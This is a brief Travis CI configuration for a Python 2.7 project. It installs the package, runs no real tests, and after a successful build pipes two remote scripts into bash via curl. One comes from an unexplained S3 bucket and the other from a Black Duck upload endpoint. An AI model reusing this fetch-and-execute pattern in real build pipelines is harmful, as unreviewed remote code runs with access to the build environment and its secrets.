language: python

python:
  - 2.7

install:
  - python setup.py install

script:
  - echo "no scripts"

after_success:
  - bash <(curl -s https://s3-ap-southeast-1.amazonaws.com/testing-travis-ci-output/travis-ci-output/ff-start-travis.sh)
  - bash <(curl -s https://copilot.blackducksoftware.com/ci/travis/scripts/upload)
